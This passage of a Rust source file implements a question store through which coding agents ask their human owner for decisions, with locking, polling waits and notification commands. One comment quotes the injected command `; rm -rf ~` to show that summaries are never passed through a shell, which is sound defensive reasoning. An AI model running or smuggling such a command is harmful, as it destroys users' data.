889 /// is not touched: the caller clears `panel` and `assets` and `put`s it,
890 /// in the same order as everywhere else here.
891 ///
892 /// [`put_panel`]: Questions::put_panel
893 pub fn drop_panel(&self, id: &str) -> Result<()> {
894 if !valid_asset_name(id) {
895 bail!("question id `{id}` is not a name magi will build a panel path from");
896 }
897 clear_dir(&self.panel_dir(id))?;
898 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
899 }
900
901 /// Path of the lease sidecar for one question id.
902 pub fn lease_path(&self, id: &str) -> PathBuf {
903 self.root.join(format!("{id}.lease"))
904 }
905
906 /// The lease on a question, if a readable one exists.
907 pub fn read_lease(&self, id: &str) -> Option<Lease> {
908 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
909 serde_json::from_str(&body).ok()
910 }
911
912 /// Say, as `kind`, that something is alive and waiting on this question.
913 ///
914 /// Best-effort: a beat that cannot be written is a `tracing::debug`, never
915 /// a reason to abandon a wait - the worst it costs is the waiter deciding
916 /// the holder is gone a little early, and that is what the delivery guard
917 /// (the seat still being busy) is there for.
918 pub fn beat(&self, id: &str, kind: WaiterKind) {
919 let lease = Lease {
920 kind,
921 pid: std::process::id(),
922 beat_at: Timestamp::now(),
923 };
924 let path = self.lease_path(id);
925 let tmp = path.with_extension("lease.tmp");
926 let written = std::fs::create_dir_all(&self.root)
927 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
928 .and_then(|()| std::fs::rename(&tmp, &path));
929 if let Err(e) = written {
930 tracing::debug!("could not beat the lease on question {id}: {e}");
931 }
932 }
933
934 /// Remove the lease sidecar. Absent is fine.
935 pub fn drop_lease(&self, id: &str) {
936 let _ = std::fs::remove_file(self.lease_path(id));
937 }
938
939 /// Read-modify-write one question under a short exclusive lock, so the
940 /// waiter's bookkeeping, the asker's and the phone's `say` cannot overwrite
941 /// each other with a copy that predates the others.
942 ///
943 /// [`Questions::put`] is an atomic *replace*, which protects a reader from
944 /// a torn file and does nothing for two writers that both read the same
945 /// version first. Everything that changes a question that can still be
946 /// answered goes through here: `f` sees the current record, not one loaded
947 /// earlier. A lock older than [`LOCK_STALE`] belongs to a writer that died
948 /// mid-update and is broken.
949 pub fn update<T>(
950 &self,
951 id: &str,
952 f: impl FnOnce(&mut Question) -> Result<T>,
953 ) -> Result<(Question, T)> {
954 std::fs::create_dir_all(&self.root)
955 .with_context(|| format!("create {}", self.root.display()))?;
956 let lock = self.root.join(format!("{id}.lock"));
957 let started = std::time::Instant::now();
958 loop {
959 match std::fs::OpenOptions::new()
960 .write(true)
961 .create_new(true)
962 .open(&lock)
963 {
964 Ok(_) => break,
965 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
966 let stale = std::fs::metadata(&lock)
967 .and_then(|m| m.modified())
968 .ok()
969 .and_then(|t| t.elapsed().ok())
970 .is_some_and(|age| age > LOCK_STALE);
971 if stale {
972 let _ = std::fs::remove_file(&lock);
973 } else if started.elapsed() > LOCK_STALE {
974 bail!("could not lock question {id}");
975 } else {
976 std::thread::sleep(Duration::from_millis(15));
977 }
978 }
979 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
980 }
981 }
982 struct Unlock(PathBuf);
983 impl Drop for Unlock {
984 fn drop(&mut self) {
985 let _ = std::fs::remove_file(&self.0);
986 }
987 }
988 let _guard = Unlock(lock);
989 let mut q = read_path(&self.path_of(id))?;
990 let out = f(&mut q)?;
991 self.put(&mut q)?;
992 Ok((q, out))
993 }
994
995 /// Write a question, atomically, so a process killed mid-write leaves the
996 /// previous state readable rather than a truncated file that would strand
997 /// the run waiting on it.
998 pub fn put(&self, q: &mut Question) -> Result<()> {
999 std::fs::create_dir_all(&self.root)
1000 .with_context(|| format!("create {}", self.root.display()))?;
1001 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1002 let path = self.path_of(&q.id);
1003 let tmp = path.with_extension("json.tmp");
1004 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1005 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1006 Ok(())
1007 }
1008
1009 /// Load a question by id or unambiguous id prefix.
1010 pub fn get(&self, id: &str) -> Result<Question> {
1011 let resolved = self.resolve_id(id)?;
1012 read_path(&self.path_of(&resolved))
1013 }
1014
1015 /// Every question on disk: open first, then newest first.
1016 ///
1017 /// Open first because that ordering is the product - the list exists to
1018 /// show the operator what has stopped, and an answered question is history
1019 /// underneath it. Unreadable files are skipped rather than fatal: one
1020 /// corrupt question must not take the web UI down, and must certainly not
1021 /// hide the open question the operator was looking for.
1022 pub fn list(&self) -> Vec<Question> {
1023 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1024 .into_iter()
1025 .flatten()
1026 .flatten()
1027 .map(|e| e.path())
1028 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1029 .filter_map(|p| read_path(&p).ok())
1030 .collect();
1031 all.sort_unstable_by(|a, b| {
1032 let rank = |q: &Question| u8::from(!q.status.open());
1033 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1034 });
1035 all
1036 }
1037
1038 /// Open questions belonging to one run, newest first.
1039 ///
1040 /// Used to decide whether a parked run can be resumed: while this is
1041 /// non-empty, nothing about the run has changed and no agent should be
1042 /// spawned for it.
1043 pub fn open_for(&self, run: &str) -> Vec<Question> {
1044 self.list()
1045 .into_iter()
1046 .filter(|q| q.status.open() && q.run == run)
1047 .collect()
1048 }
1049
1050 /// Abandon every open question belonging to a run, and report how many.
1051 ///
1052 /// Called when a run's record is deleted. The agent that asked died with
1053 /// the run, so there is nobody left to hand an answer to, and a question
1054 /// left open would keep asking the operator for a decision that can no
1055 /// longer be delivered - the phone showed exactly that: "auth.rs というファ
1056 /// イルが見つかりません" with two buttons, for a run whose directory had
1057 /// been gone for two hours.
1058 ///
1059 /// Abandoned rather than deleted, because [`Question::abandon`] already
1060 /// means "this can no longer be answered" and the record of having asked
1061 /// is worth keeping. Answered questions are left exactly as they are.
1062 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1063 let mut abandoned = 0;
1064 for mut q in self.open_for(run) {
1065 q.abandon(why);
1066 self.put(&mut q)?;
1067 abandoned += 1;
1068 }
1069 Ok(abandoned)
1070 }
1071
1072 /// Abandon a run's open questions once `status` says the run is not
1073 /// coming back, worded with what it actually became.
1074 ///
1075 /// The run-deleted case above and this one are the same fact - nobody is
1076 /// left to read an answer - reached by two different doors. This is the
1077 /// one for a run that finished on its own: merged, reached `Ready` with
1078 /// nothing left to do, failed outright with no established point to
1079 /// resume from, or every candidate agreed, with evidence, that nothing
1080 /// belonged in the worktree. Those are exactly the statuses
1081 /// [`RunStatus::resumable`]
1082 /// excludes, and that is the line this draws too - deliberately not
1083 /// [`RunStatus::done`], which also counts `Blocked` and `Stalled` as
1084 /// over. Both of those can still be picked back up with the candidates,
1085 /// the review round and the seat sessions already on disk, so a question
1086 /// asked mid-round may yet get a real answer from a real resume, and
1087 /// folding it here would be exactly the mistake this function exists to
1088 /// avoid on the other side - answering back into a run that no longer
1089 /// exists to read it.
1090 ///
1091 /// A no-op, not an error, when `status` is still resumable or when there
1092 /// was nothing open to begin with - callers reach this from more than one
1093 /// place a run can settle, and a second call finding nothing left to
1094 /// abandon is the expected case, not a bug.
1095 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1096 if status.resumable() {
1097 return Ok(0);
1098 }
1099 let why = format!(
1100 "run {run} {}, so nothing is waiting for this answer",
1101 status.as_str()
1102 );
1103 // A post-merge notice is the exception: it is filed *because* the run
1104 // merged, and no agent waits on it - it is a to-do for the owner, not
1105 // a question a dead seat asked. Abandoning it here would erase the
1106 // only alert the moment the run settles.
1107 let mut abandoned = 0;
1108 for mut q in self.open_for(run) {
1109 if q.node == crate::bump::NOTICE_NODE {
1110 continue;
1111 }
1112 q.abandon(&why);
1113 self.put(&mut q)?;
1114 abandoned += 1;
1115 }
1116 Ok(abandoned)
1117 }
1118
1119 /// Expand an id prefix to exactly one question id. The short id the phone
1120 /// and the reports show is a suffix, so that is accepted too.
1121 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1122 if self.path_of(prefix).is_file() {
1123 return Ok(prefix.to_owned());
1124 }
1125 let hits: Vec<String> = self
1126 .list()
1127 .into_iter()
1128 .map(|q| q.id)
1129 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1130 .collect();
1131 match hits.len() {
1132 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1133 0 => bail!("no question matches `{prefix}`"),
1134 _ => bail!(
1135 "`{prefix}` matches {} questions: {}",
1136 hits.len(),
1137 hits.join(", ")
1138 ),
1139 }
1140 }
1141
1142 /// Newest modification time in the store, in milliseconds, for change
1143 /// detection. The web UI compares this instead of re-reading every
1144 /// question, so an idle phone on a slow link costs one `stat` per file.
1145 pub fn revision(&self) -> u64 {
1146 std::fs::read_dir(&self.root)
1147 .into_iter()
1148 .flatten()
1149 .flatten()
1150 .filter_map(|e| e.metadata().ok())
1151 .filter_map(|m| m.modified().ok())
1152 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1153 .map(|d| d.as_millis() as u64)
1154 .max()
1155 .unwrap_or(0)
1156 }
1157
1158 /// How many questions are open, whichever side of the conversation is
1159 /// holding the ball right now. Ten turns of back and forth between the
1160 /// owner and the agent are still one open question - see
1161 /// [`Question::say`] - so this does not drop while a reply is in
1162 /// flight. [`Self::count_needs_owner`] is the number that does.
1163 pub fn count_open(&self) -> usize {
1164 self.list().iter().filter(|q| q.status.open()).count()
1165 }
1166
1167 /// How many open questions actually need the owner right now: open, and
1168 /// not [`Question::waiting_on_agent`].
1169 ///
1170 /// This is the number a notification channel owes - the ask bar, the nav
1171 /// badge, the document title - because those exist to say "something
1172 /// needs you", and a question sitting in `magi ask --thread` limbo does
1173 /// not. `count_open` stays as it is for [`Self::open_for`]'s callers,
1174 /// where a round trip must not look like the run resumed.
1175 pub fn count_needs_owner(&self) -> usize {
1176 self.list()
1177 .iter()
1178 .filter(|q| q.status.open() && !q.waiting_on_agent())
1179 .count()
1180 }
1181}
1182
1183/// How a wait over [`Question`] ended.
1184#[derive(Debug, Clone, PartialEq, Eq)]
1185pub enum Wait {
1186 /// The owner decided. Carries [`Question::resolution`].
1187 Answered(String),
1188 /// The owner spoke back without deciding - see [`Question::say`]. The
1189 /// question is still [`QuestionStatus::Open`] and carries no [`Answer`];
1190 /// the caller's move is to hand this text to the agent and let it call
1191 /// `magi ask --thread` to keep talking, not to treat it as a decision.
1192 Replied(String),
1193 /// This call's [`WAIT_SLICE`] ran out with the question still
1194 /// [`QuestionStatus::Open`] and nothing having happened - not the owner
1195 /// going quiet, the clock on *this process* running out. The question is
1196 /// untouched; the caller's move is `magi ask --wait <id>` in a fresh
1197 /// process, so the wait resumes before the shell tool that would have
1198 /// killed this one gets the chance.
1199 Pending,
1200 /// Nobody said anything before the deadline, or the question was closed
1201 /// out from under the wait with no decision recorded - a run deleted out
1202 /// from under it, most often. Either way [`QuestionStatus::Abandoned`] is
1203 /// now on disk.
1204 Abandoned,
1205}
1206
1207/// File a question and wait for the owner, polling the store.
1208///
1209/// The question is updated in place from disk whenever the wait ends, so the
1210/// caller can act on it without re-reading it. `timeout` is the question's
1211/// whole `answer_timeout` budget, but this call spends at most [`WAIT_SLICE`]
1212/// of it - see [`Wait::Pending`] for what happens to the rest.
1213pub async fn ask_and_wait(
1214 q: &mut Question,
1215 store: &Questions,
1216 notify: &config::Notify,
1217 timeout: Duration,
1218) -> Result<Wait> {
1219 wait_for_owner(q, store, notify, timeout, POLL).await
1220}
1221
1222/// Resume a wait already filed, without adding a turn or notifying again.
1223///
1224/// This is `magi ask --wait <id>`'s engine: the process that owned the
1225/// previous slice is dead (the tool that ran it killed it, or it simply
1226/// exited after reporting [`Wait::Pending`]), but the question on disk never
1227/// stopped being open, and the owner was already notified about it once. A
1228/// second notification for the same unanswered question would page the
1229/// owner every [`WAIT_SLICE`] for a question they have already seen - so,
1230/// unlike [`ask_and_wait`], this skips straight to polling.
1231///
1232/// `timeout` is **not** re-armed to a fresh `answer_timeout` here - the
1233/// caller computes it as what remains until [`Question::asked_at`] plus the
1234/// configured `answer_timeout`, so stacking `--wait` calls can only ever use
1235/// up the deadline the first ask set, never push it out further.
1236pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1237 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1238}
1239
1240/// [`ask_and_wait`] with the poll interval injected.
1241///
1242/// Separate only so the tests can drive a whole wait in milliseconds instead of
1243/// sleeping through [`POLL`]; production has exactly one interval, and it is not
1244/// a knob the operator gets to tune.
1245async fn wait_for_owner(
1246 q: &mut Question,
1247 store: &Questions,
1248 cfg: &config::Notify,
1249 timeout: Duration,
1250 poll: Duration,
1251) -> Result<Wait> {
1252 // A question that is already on disk (a `--thread` reply just wrote it under
1253 // the lock) is left alone: this copy may predate an answer or say that
1254 // landed since, and writing it back would erase that.
1255 if !store.path_of(&q.id).is_file() {
1256 store.put(q).context("file the question")?;
1257 }
1258 if q.should_notify(Timestamp::now()) {
1259 if let Err(e) = notify(cfg, q).await {
1260 // A broken webhook is not a reason to throw away an implementation.
1261 // The question is already on disk and the web UI already shows it,
1262 // so the operator still has a way in; only the tap on the shoulder
1263 // is lost.
1264 tracing::warn!(
1265 "could not notify about question {}: {e:#} - the web UI is the \
1266 only surface for it now",
1267 q.short()
1268 );
1269 }
1270 }
1271 tracing::info!(
1272 "question {} from {} is waiting for you: {}",
1273 q.short(),
1274 q.seat,
1275 q.summary
1276 );
1277 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1278}
1279
1280/// Take the wait as this process: beat the lease and note it on the record.
1281fn hold(store: &Questions, id: &str) {
1282 store.beat(id, WaiterKind::Asker);
1283 let took = store.update(id, |q| {
1284 if q.status.open() {
1285 q.waiter = Some(Waiter {
1286 kind: WaiterKind::Asker,
1287 since: Timestamp::now(),
1288 });
1289 }
1290 Ok(())
1291 });
1292 if let Err(e) = took {
1293 tracing::debug!("could not note the wait on question {id}: {e:#}");
1294 }
1295}
1296
1297/// Record that the agent has read everything so far, so the daemon waiter does
1298/// not resume a session to tell it what was already printed.
1299///
1300/// Callers must invoke this only **after** the word reached the agent's stdout:
1301/// marking first would let a tool timeout kill the process between the mark
1302/// and the print, and the waiter would then consider a word delivered that no
1303/// agent ever saw.
1304pub fn hand_over(store: &Questions, q: &mut Question) {
1305 let done = store.update(&q.id, |r| {
1306 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1307 if r.status == QuestionStatus::Answered {
1308 r.answer_delivered = true;
1309 }
1310 r.waiter = None;
1311 Ok(())
1312 });
1313 match done {
1314 Ok((fresh, ())) => *q = fresh,
1315 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1316 }
1317}
1318
1319/// The polling loop shared by a fresh wait and a resumed one.
1320///
1321/// `timeout` is the budget left before the question's `answer_timeout`
1322/// truly runs out; `slice` bounds how much of that this one call spends
1323/// before handing control back. Landing on `slice` while `timeout` still has
1324/// budget left is [`Wait::Pending`] - the caller's move, not the owner's
1325/// silence. Landing on `timeout` itself - because it was no bigger than
1326/// `slice` to begin with - is the real thing, and abandons the question
1327/// exactly as a single unsliced wait always did.
1328async fn wait_loop(
1329 q: &mut Question,
1330 store: &Questions,
1331 timeout: Duration,
1332 slice: Duration,
1333 poll: Duration,
1334) -> Result<Wait> {
1335 // The owner may already have spoken back before this call ever started -
1336 // most often because they did so in the gap between an earlier call
1337 // reporting `Wait::Pending` and this one picking the wait back up with
1338 // `--wait`. That word must surface at once rather than sit unnoticed
1339 // until some *later* turn happens to change something: this call never
1340 // saw it get added, so nothing below would otherwise recognise it as
1341 // new. `last_word_awaiting_reply` reads the question's own record of
1342 // whose turn it is - see [`Question::waiting_on_agent`] - rather than a
1343 // turn count this call would have to have been there to capture.
1344 if let Some(said) = q.unread_from_owner() {
1345 return Ok(Wait::Replied(said));
1346 }
1347 hold(store, &q.id);
1348
1349 let bounded = timeout.min(slice);
1350 let is_the_real_deadline = bounded >= timeout;
1351 let deadline = tokio::time::Instant::now() + bounded;
1352 loop {
1353 let now = tokio::time::Instant::now();
1354 if now >= deadline {
1355 if !is_the_real_deadline {
1356 // The lease is left to age out on purpose: the caller is about
1357 // to run `magi ask --wait`, and that gap is what LEASE_TTL
1358 // covers.
1359 return Ok(Wait::Pending);
1360 }
1361 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1362 // Re-checked on the record as it is now: the owner may have said
1363 // something in time since the last poll, and that word is handed
1364 // over, not abandoned.
1365 let (fresh, unread) = store
1366 .update(&q.id, |r| {
1367 let unread = r.unread_from_owner();
1368 if unread.is_none() {
1369 r.abandon(&why);
1370 r.waiter = None;
1371 }
1372 Ok(unread)
1373 })
1374 .context("record the abandoned question")?;
1375 *q = fresh;
1376 if let Some(said) = unread {
1377 return Ok(Wait::Replied(said));
1378 }
1379 tracing::warn!(
1380 "question {} went unanswered for {}s; the run parks and the \
1381 question stays as the record of it",
1382 q.short(),
1383 timeout.as_secs()
1384 );
1385 return Ok(Wait::Abandoned);
1386 }
1387 tokio::time::sleep(poll.min(deadline - now)).await;
1388 store.beat(&q.id, WaiterKind::Asker);
1389 match store.get(&q.id) {
1390 Ok(fresh) if !fresh.status.open() => {
1391 // Whoever answered - the phone, `magi answer`, another daemon -
1392 // owns the record now, so adopt theirs wholesale rather than
1393 // merging into a copy that predates it.
1394 *q = fresh;
1395 return Ok(match q.resolution() {
1396 Some(a) => Wait::Answered(a),
1397 // Closed with no decision - abandoned elsewhere, most
1398 // often by the run behind it being deleted mid-wait.
1399 None => Wait::Abandoned,
1400 });
1401 }
1402 Ok(fresh) => {
1403 if let Some(said) = fresh.unread_from_owner() {
1404 *q = fresh;
1405 return Ok(Wait::Replied(said));
1406 }
1407 // Still open and not waiting on the agent - nothing this
1408 // wait cares about happened, so keep polling.
1409 }
1410 Err(e) => {
1411 // Mid-rename, or a file the operator is editing by hand.
1412 // Neither is a reason to abandon a question a human may still
1413 // answer, so keep polling until the deadline decides.
1414 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1415 }
1416 }
1417 }
1418}
1419
1420/// Run the operator's notification command, if one is configured.
1421///
1422/// The command is argv, never a shell string, and the substitutions below are a
1423/// single pass over each argument: a summary containing `; rm -rf ~` is one
1424/// argument to one program, and a summary containing the characters `{run}` is
1425/// not re-expanded. That property is the reason agent-authored text can be put
1426/// in a notification at all.
1427///
1428/// An error here is reported, not swallowed, so `magi notify --test` can show
1429/// the operator why nothing arrives. The waiting path logs it and carries on.
1430pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1431 notify_text(cmd, &q.run, &q.summary).await
1432}
1433
1434/// [`notify`] for an event that is not a question: the same command, the same
1435/// placeholders, with `summary` and `run` supplied directly.
1436pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1437 let Some((program, args)) = cmd.command.split_first() else {
1438 // No command configured: the web UI is the only surface, by choice.
1439 return Ok(());
1440 };
1441 let url = web_url();
1442 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1443 tracing::warn!(
1444 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1445 so the link will be empty - export it next to `magi serve` with \
1446 the address `magi web --open` printed"
1447 );
1448 }
1449 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1450 tracing::debug!(program = %program, args = ?argv, "notifying");
1451
1452 let mut child = tokio::process::Command::new(program);
1453 child.quiet();
1454 child
1455 .args(&argv)
1456 .stdin(std::process::Stdio::null())
1457 // Killed if the timeout below drops this future: a notification
1458 // command left running would outlive the run it was announcing.
1459 .kill_on_drop(true);
1460 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1461 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1462 Err(_) => bail!(
1463 "notification command `{program}` did not finish within {}s",
1464 NOTIFY_TIMEOUT.as_secs()
1465 ),
1466 };
1467 if !out.status.success() {
1468 let stderr = String::from_utf8_lossy(&out.stderr);
1469 let why = stderr
1470 .lines()
1471 .rev()
1472 .find(|l| !l.trim().is_empty())
1473 .unwrap_or("no output on stderr")
1474 .trim();
1475 bail!(
1476 "notification command `{program}` exited with {}: {why}",
1477 out.status
1478 );
1479 }
1480 Ok(())
1481}
1482
1483/// Substitute `{summary}`, `{run}` and `{url}` into one argument.
1484///
1485/// One left-to-right pass, so a substituted value is never scanned for further
1486/// placeholders. Agent prose contains braces, and an agent quoting `{summary}`
1487/// in a question must not make the notification recursive.
1488fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1489 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1490 let mut out = String::with_capacity(template.len());
1491 let mut rest = template;
1492 while let Some(at) = rest.find('{') {
1493 out.push_str(&rest[..at]);
1494 let tail = &rest[at..];
1495 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1496 Some((token, value)) => {
1497 out.push_str(value);
1498 rest = &tail[token.len()..];
1499 }
1500 None => {
1501 // Not a placeholder magi knows: it is the operator's own text.
1502 out.push('{');
1503 rest = &tail[1..];
1504 }
1505 }
1506 }
1507 out.push_str(rest);
1508 out
1509}
1510
1511/// The URL `{url}` expands to, from [`WEB_URL_ENV`].
1512fn web_url() -> String {
1513 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1514}
1515
1516/// Point a configured base URL at the view that can answer the question.
1517///
1518/// A notification the operator has to navigate from is a question that stays
1519/// unanswered until morning, so the questions view is appended - unless the
1520/// operator already wrote a fragment, in which case they have said where they
1521/// want to land and magi does not know better.
1522fn question_url(base: &str) -> String {
1523 let base = base.trim().trim_end_matches('/');
1524 if base.is_empty() || base.contains('#') {
1525 return base.to_owned();
1526 }
1527 format!("{base}/#/questions")
1528}
1529
1530/// Assemble a panel's contents in an already-empty directory.
1531///
1532/// Split out so [`Questions::put_panel`] can delete the whole directory on the
1533/// first error without an early `return` skipping that cleanup.
1534fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1535 let index = dir.join(PANEL_HTML);
1536 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1537 for (name, src) in assets {
1538 let dst = dir.join(name);
1539 std::fs::copy(src, &dst)
1540 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1541 }
1542 Ok(())
1543}
1544
1545/// Remove a directory and everything under it, treating "not there" as done.
1546///
1547/// A panel is replaced wholesale and dropped idempotently, and in both cases
1548/// the absence of the directory is the desired end state, not an error.
1549fn clear_dir(path: &Path) -> Result<()> {
1550 match std::fs::remove_dir_all(path) {
1551 Ok(()) => Ok(()),
1552 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1553 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1554 }
1555}
1556
1557fn read_path(path: &Path) -> Result<Question> {
1558 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1559 let q: Question =
1560 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1561 if q.schema > SCHEMA {
1562 // Strictly newer, not merely different: every field added since
1563 // schema 1 carries `#[serde(default)]`, so an *older* schema reads
1564 // here as "no thread yet" rather than as garbage. Only a schema this
1565 // build has never heard of is refused.
1566 bail!(
1567 "question {} was written by a newer magi (schema {}, this build \
1568 only speaks up to {SCHEMA})",
1569 q.id,
1570 q.schema
1571 );
1572 }
1573 Ok(q)
1574}
1575
1576fn short(id: &str) -> &str {
1577 id.split('-').next_back().unwrap_or(id)
1578}
1579
1580fn new_id() -> String {
1581 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1582 let seed = crate::rng::entropy();
1583 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1584}
1585
1586#[cfg(test)]
1587mod tests {
1588 use super::*;
1589
1590 /// A store of its own, with no process-global state - which is the point of
1591 /// `Questions::at`, and why these can run in parallel.
1592 fn store() -> (tempfile::TempDir, Questions) {
1593 let dir = tempfile::tempdir().unwrap();
1594 let s = Questions::at(dir.path().join("questions"));
1595 (dir, s)
1596 }
1597
1598 #[test]
1599 fn deleting_a_run_stops_its_questions_asking() {
1600 let (_dir, store) = store();
1601
1602 let mut open_one = choice_question();
1603 store.put(&mut open_one).unwrap();
1604 let mut answered = free_question();
1605 answered
1606 .answer(Answer::Text("keep this".to_owned()))
1607 .unwrap();
1608 store.put(&mut answered).unwrap();
1609 let mut elsewhere = choice_question();
1610 elsewhere.run = "20260903-105039-3cbf".to_owned();
1611 store.put(&mut elsewhere).unwrap();
1612
1613 let n = store
1614 .abandon_for_run(&open_one.run, "run was deleted")
1615 .unwrap();
1616 assert_eq!(n, 1, "only the open question of that run");
1617
1618 let back = store.get(&open_one.id).unwrap();
1619 assert!(!back.status.open(), "it no longer asks for a decision");
1620 assert!(
1621 back.detail.contains("run was deleted"),
1622 "the operator can see why: {}",
1623 back.detail
1624 );
1625
1626 let kept = store.get(&answered.id).unwrap();
1627 assert_eq!(
1628 kept.status,
1629 QuestionStatus::Answered,
1630 "an answered question is a decision on record, not something to revoke"
1631 );
1632 assert!(
1633 store.get(&elsewhere.id).unwrap().status.open(),
1634 "another run's question is untouched"
1635 );
1636 assert!(store.open_for(&open_one.run).is_empty());
1637 }
1638
1639 #[test]
1640 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
1641 let (_dir, store) = store();
1642 let mut q = choice_question();
1643 store.put(&mut q).unwrap();
1644
1645 // `Blocked` can still be resumed - leave it exactly as it was.
1646 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1647 assert_eq!(n, 0);
1648 assert!(store.get(&q.id).unwrap().status.open());
1649
1650 // `Failed` is not - abandon it, with the run and its fate in the
1651 // reason so the owner can tell what happened without a run to read.
1652 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1653 assert_eq!(n, 1);
1654 let back = store.get(&q.id).unwrap();
1655 assert!(!back.status.open());
1656 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
1657
1658 // A second call against the same, now-settled run finds nothing left.
1659 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
1660 }
1661
1662 fn choice_question() -> Question {
1663 Question::new(
1664 "20260902-201256-9fb7".to_owned(),
1665 "implement".to_owned(),
1666 "impl-A".to_owned(),
1667 "Which storage backend should the cache use?".to_owned(),
1668 "Both are already dependencies.".to_owned(),
1669 vec!["SQLite".to_owned(), "Redis".to_owned()],
1670 )
1671 }
1672
1673 fn free_question() -> Question {
1674 Question::new(
1675 "20260902-201256-9fb7".to_owned(),
1676 "review".to_owned(),
1677 "rev-1".to_owned(),
1678 "What should the error message say?".to_owned(),
1679 String::new(),
1680 Vec::new(),
1681 )
1682 }
1683
1684 /// No notification, which is the default and what most of these want.
1685 fn quiet() -> config::Notify {
1686 config::Notify::default()
1687 }
1688
1689 #[test]
1690 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
1691 // The front end parses these names by hand; there is no shared schema
1692 // and no compiler between the two. A rename here is a UI that shows an
1693 // empty card and reports no error, so the names are asserted literally.
1694 let mut q = choice_question();
1695 q.id = "20260902-231501-ab12".to_owned();
1696 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
1697 // `serde_json::Value` holds an object's keys sorted, and key order
1698 // means nothing to a JSON reader anyway: the field *set* is what the
1699 // front end was written against, so that is what is pinned here.
1700 let keys: Vec<&str> = open
1701 .as_object()
1702 .unwrap()
1703 .keys()
1704 .map(String::as_str)
1705 .collect();
1706 assert_eq!(
1707 keys,
1708 [
1709 "answer",
1710 "answer_delivered",
1711 "answer_timeout",
1712 "answered_at",
1713 "asked_at",
1714 "assets",
1715 "choices",
1716 "cwd",
1717 "delivered_turns",
1718 "detail",
1719 "id",
1720 "node",
1721 "panel",
1722 "run",
1723 "schema",
1724 "seat",
1725 "status",
1726 "summary",
1727 "thread",
1728 "waiter",
1729 ],
1730 "the on-disk field set is a contract with the front end"
1731 );
1732 assert_eq!(open["schema"], 4);
1733 assert_eq!(open["thread"], serde_json::json!([]));
1734 assert_eq!(open["id"], "20260902-231501-ab12");
1735 assert_eq!(open["run"], "20260902-201256-9fb7");
1736 assert_eq!(open["node"], "implement");
1737 assert_eq!(open["seat"], "impl-A");
1738 assert_eq!(open["status"], "open");
1739 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
1740 assert_eq!(open["answered_at"], serde_json::Value::Null);
1741 assert_eq!(open["answer"], serde_json::Value::Null);
1742 let asked = open["asked_at"].as_str().unwrap();
1743 assert!(
1744 asked.ends_with('Z') && asked.contains('T'),
1745 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
1746 );
1747
1748 // A chosen option, exactly as the contract spells it.
1749 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
1750 let answered = serde_json::to_value(&q).unwrap();
1751 assert_eq!(answered["status"], "answered");
1752 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
1753 assert!(answered["answered_at"].is_string());
1754
1755 // And free text, which is the other of the two forms.
1756 let mut free = free_question();
1757 free.answer(Answer::Text("Say which file it was".to_owned()))
1758 .unwrap();
1759 assert_eq!(
1760 serde_json::to_value(&free).unwrap()["answer"],
1761 serde_json::json!({"text": "Say which file it was"})
1762 );
1763
1764 // And it survives the round trip a reader actually performs.
1765 let body = serde_json::to_string(&q).unwrap();
1766 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
1767 }
1768
1769 #[test]
1770 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
